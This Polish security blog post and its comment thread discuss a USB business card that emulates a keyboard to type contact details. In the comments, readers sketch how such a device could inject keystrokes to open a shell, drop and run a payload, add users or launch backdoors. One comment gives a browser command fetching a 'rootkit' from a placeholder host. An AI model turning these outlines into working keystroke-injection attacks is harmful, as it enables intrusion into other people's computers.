11:49
6/11/2010

Prawdziwie hackerski projekt stworzył Frank Zhao. Zobaczcie sami:

Wizytówka na USB

Wizytówka via USB

Po podpięciu do komputera, układ wykrywa potrójne naciśnięcie klawisze Caps-Lock i wypisuje na ekran dane kontaktowe …a mogłaby instalować rootkita! ;-). Wszystko zostało wykonane na mikrokontrolerze AVR ATtiny85, z pomocą V-USB.

Poproszę 3 takie, ale na PS2.


Dowiedz się, jak zabezpieczyć swoje dane i pieniądze przed cyberprzestępcami. Wpadnij na nasz kultowy ~3 godzinny wykład pt. "Jak nie dać się zhackować?" i poznaj kilkadziesiąt praktycznych i przede wszystkim prostych do zastosowania porad, które skutecznie podniosą Twoje bezpieczeństwo i pomogą ochronić przed atakami Twoich najbliższych. Uczestnicy tego wykładu oceniają go na: 9,34/10!

Na ten wykład powinien przyjść każdy, kto korzysta z internetu na smartfonie lub komputerze, prywatnie albo służbowo. Wykład prowadzimy prostym językiem, wiec zrozumie go każdy, także osoby spoza branży IT. Dlatego na wykład możesz spokojnie przyjść ze swoimi rodzicami lub mniej technicznymih znajomych. W najbliższych tygodniach będziemy w poniższych miastach:

Zobacz pełen opis wykładu klikając tutaj lub kup bilet na wykład klikając tu.

40 komentarzy

Dodaj komentarz
  1. Ciekawe tylko jak to działa? Używa BIOSu do wypisania na ekranie czegoś? Czy wymaga jakiegoś konkretnego systemu operacyjnego żeby to działało?

  2. Efektowne – tylko 99% moich klientów dostałoby zapewne zawału serca ;)

  3. gdzieś już to widziałem, układ emuluje klawiaturę dlatego działa na praktycznie dowolnym systemie gdzie istnieje coś ala notatnik ;)

  4. raczej działa jak zwykła klawiatura na USB. Uc wysyła po prostu ciąg zapisany w pamięci flash czy też eeprom. Niemniej bardzo fajne to, np na rozmowę kwalifikacyjną :)

  5. IHMO to udaje klawiature USB a nie pendriva

  6. Proste: wizytowka jest klawiatura na USB (HID). Jak podlaczycie do komputera dwie klawiatury, to zobaczycie, ze wcisniecie caps locka na jednej sprawia, ze swieca sie diody na obydwoch, wiec wizytowka po prostu “rejestruje” status diody od capsa i w przypadku potrojnego wcisniecia doslownie wypisuje zapisane informacje – klawisz po klawiszu. Pomyslowe, ale o zadnym “moglo instalowac rootkita” nie ma mowy ;)

  7. Chyba po prostu układ jest wykrywany w systemie jako klawiatura (stąd może wiedzieć o tym, że caps lock został wciśnięty i wypisać coś na ekran). W takim przypadku teoretycznie powinno działać pod każdym systemem.

  8. no raczej za mało pamięci takie AVRki mają, żeby tam rootkita upchać, ten ma:
    8KB of In-System Self-Programmable Flash
    512 Bytes In-System Programmable EEPROM
    512 Bytes Internal SRAM

  9. Magia odczarowana.

    To działa jak klawiatura (bardziej zaawansowani w temacie USB powiedzą: urządzenie HID realizujące profil klawiatury).
    Po podłączeniu tego urządzenia do komputera w systemie pojawia się druga klawiatura.
    Wszystkie klawiatury otrzymują informacje o stanach CapsLock (jeśli zmienisz stan na jednej to wszystkie klawiatury się o tym dowiadują – można to sprawdzić podłączając sobie do komputera kilka klawiatur).

    Urządzenie przedstawione na filmie po wykryciu zmian CapsLocka po prostu zaczyna wysyłać sekwencje naciskanych klawiszy (po to jest też potrzebne aktywne okno notatnika lub innego edytora – żeby pisać do jakiegoś pola edycyjnego).

    @Mateusz: Co do użycia na rozmowie kwalifikacyjnej – fajny gadżet ale raczej jako mały plus do (mam nadzieję) dużej wiedzy w temacie. :)

  10. @Mateusz wersje demo rootkita może, tak żeby dobrze się zaprezentować :)

  11. @dos – dlaczego uważasz, że nie mogłoby zainstalować rootkit’a ? Jaki problem odpalić z tej wirtualnej klawiatury shell’a i jakiś windowsowy odpowiednik “cat > rootkit.exe” ;)

  12. @mrk: moze byc trudno z tym Windowsowym odpowiednikiem, to po pierwsze. Po drugie – wystarczy klikniecie przez uzytkownika gdziekolwiek, zeby okno stracilo focus – i “po ptokach”. Po trzecie – instalacja bylaby zbyt dobrze widoczna i wzglednie malo skuteczna, co sprawia, ze po prostu nie warto sie w to tak bawic, bo strasznie latwo byloby powiazac ze soba wizytowke z malwarem, a z kolei wizytowke z osoba, ktora nam ja dala ;)

  13. A na Mac OS też zadziała? ;-)

  14. Wystarczy żeby otwierał notatnika, wpisywał to wszystko i zapisywał pod podaną nazwą – to da się zrobić przy pomocy klawiatury.

  15. No tak… jakoś filmik mi się zlał i myslałem, że to zdjęcie :D
    Moja wina. Rzeczywiście jako klawiatura to działa zapewne.

  16. @Dreadlish: wtedy to juz na pewno bedzie nie do zauwazenia… ;)

  17. To teraz niech ktoś poda instrukcje jak samemu takie coś zrobić ;)

  18. There is a ATtiny85 microcontroller on the business card that becomes an USB keyboard pre-programmed to type out text when it detects that CAPS-LOCK has been pressed a few times. — http://frank.circleofcurrent.com/cache/usbbusinesscard_details.htm

    czyli jednak jak klawiatura.. ;]

  19. JoeMonster.org rządzi ;p dwa dni temu już to widziałem na Joe własnie ;p

    • Pindziu: gratulujemy, jesteś zajebisty!

  20. Właśnie wpadłem na to, jak z tego zrobić rootkita, ale ktoś był szybszy :P
    Pomysł fajny, ale widziałem coś podobnego – bardzo mała wtyczka (mniejsza od odbiornika nano do myszek), która włącza złośliwe Caps Locka. Oglądać kogoś, kto z tym walczy – ubaw po pachy ;)

  21. @Piotr Konieczny
    Nie to żebym się czepiał Ale:
    Część z instalowaniem rootkita nie została przekreślona, znaczy podtrzymujesz tą wersję?
    Jeżeli tak to przydałoby się jakieś rozwinięcie.

    no dobra, może się jednak czepiam.

  22. hmm, ja ostatnio chciałem wytrawić CV w laminacie, ale w sumie dorobienie na tym klucza USB, to faktycznie niezły pomysł :)

  23. Jeśli by była prosta metoda na modyfikowanie zawartości pamięci to widzę bardzo fajne zastosowanie dla zapominalskich – kluczyk pamiętający hasło dostępu do komputera. Zamiast klepać hasełko wystarczy włożyć klucz i trzy razy nacisnąć CAPSa – ja chcę coś takiego.

  24. @Sergi – pomysł fajny, ale ktoś już był pierwszy :-)

    Stealth USB CapsLocker (http://macetech.com/blog/?q=node/46), “Instead of doing anything useful, it waits between 30 seconds and 8 minutes and sends the scancode for the Caps Lock key”

    i wersja bardziej rozrywkowa:
    Haunted USB Cable (http://imakeprojects.com/Projects/haunted-usb-cable/), “While plugged into a machine, it will randomly toggle tHE CAPSLOCK, randomly insert a Spa ce, a Delet, a Tab, and other mischief”

  25. System rozpoznaje go jako klawiaturę. Po nawiązaniu połączenia wysyła zestaw znaków. Dlatego jest mu potrzebny jakikolwiek edytor. Robiliśmy takie rzeczy na studiach :)

  26. @zzz1986 a jesteś w stanie przy pomocy klawiatury napisać jakiegoś rootkita? Jak tak, to masz rozwiniętą odpowiedź.

    A tak BTW to nie wiem czemu p.Zhao nie rozbudował tego, żeby notatnik sam się otworzył. Przecież otworzyć notepada za pomocą klawiatury, to wysłanie dodatkowych kilkunastu “wciśniętych” klawiszy

  27. tylko po c**** to komu? chyba ze to bzdura uczelniana ….

  28. Znając system ofiary i dysponując odpowienią pamięcią dałoby się wrzucić rootkita wysyłając coś w stylu:
    1. windows+R (uruchom)
    2. cmd.exe
    3. wrzucić payload do pliku przez hexdump
    4. odpalić plik

  29. @artak
    Ograniczona pamięć i widoczność pisania tego rootkita powoduje, że urządzenie jest niegroźne co słusznie zauważył ktoś na początku.

    Wydaje mi się to logiczne i sam nie potrafię wymyślić groźnego zastosowania i dlatego pytam.

  30. Równie dobrze możemy podpiąć to jako nowy dysk i w autorun dać program w tle z hakiem na klawiaturę

  31. No wiecie co:P Podsyłałem wam to info już 5 dni temu a wy wzięliście z jakiegoś blipa. Shame on you ;)

    • blupi: Sorewicz, mamy 243 nieodebrane wiadomości… Dziś zaczynam pracę nad Niebezpiecznikiem na full-time. Pierwsza rzeczn a todo, przejrzeć i odpowiedzieć na wszystkie zaległe e-maile ;-)

  32. A gdyby urządzenie było nie tylko klawiaturą USB? Hubem do którego podłączonych jest więcej urządzeń (wirtualnie). Dawałoby to trochę więcej rootkito podobnych możliwości.

  33. Projekt nie jest nowy. Są na prawdę dużo ciekawsze opracowania zastosowania podobnych gadżetów do testów penetracyjnych na przykład Adrian Crenshaw – PHUKD.
    “Odnośnie groźnych zastosować:
    A.Piszę szybciej niż ty i bez błędów. To ważne gdy dostęp fizyczny do urządzenia jest ograniczony ,krótki i nie chcemy zwracać na siebie uwagi.
    B.Działa nawet gdy U3 i autorun są wyłączone.
    C.Zwraca mniej uwagi niż siedzenie przy terminalu i pisanie. Wystarczy wetknąć i odwrócić uwagę.
    D.Można ustawić odliczanie czasowe na przykład gdy użytkownik komputera ma przerwę.
    E.Można uwzględnić HUB USB zapakować go w jednej zamaskowanej obudowie (na przykład fajnego tańczącego pingwinka na USB) aby zamontować o określonym czasie i odpalić program z napędu USB maskując się na przykład jakimś BSODEM ,a w tle wykonać swoje zadanie

    Jakie polecenia może wykonać?
    A.Dodać użytkownika lokalnego komputera lub domeny.
    B.Uruchomić program ,który posłuży za tylne drzwi.
    C.Iść do strony na której aktualny użytkownik jest zalogowany i wykonać atak w stylu CSRF”

    i inne

  34. D. iexplore http://www.example.com/ierootkit

  35. Z tym sztywnym capsem to mnie rozwaliło… :D

  36. Głupi i potencjalnie niebezpieczny gadżet.
    Szef ma komputer wbudowany w mebel z nieprzyjaznym dostępem i wszystkie zajęte porty usb. Biada temu kto przyniesie mu coś na pendrivie zamiast udostępnić w sieci. Nie chcę nawet myśleć o irytacji taką wizytówką.

  37. @mastalerz to głupi szef a nie gadżet.
    Urządzenie działa jako klawiatura HID, bo taki interfejs łatwo zaimplementować w mikroklocku. Pisanie dedykowanego urządzenia USB byłoby znacznie bardziej problematyczne. Sprzętowe podłączenie AVRka do USB nie jest problemem, zabawa zaczyna się właśnie w sofcie.
    Co do waszych wywodów rootkitowych, w nieco większym AVRku można spokojnie wcisnąć FATa i wtedy trzymać w dodatkowej pamięci co dusza zapragnie, i zgrywać to z kompa łatwo (często używa się ich w połączeniu z kartami SD).

  38. Karta SD może być urządzeniem:
    http://www.palminfocenter.com/images/Img_Palm_SD_Bluetooth_L.jpg

    używane było to w urządzeniach Palm, nie wiem jak w tej chwili.

Odpowiadasz na komentarz Tomasz

Kliknij tu, aby anulować

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: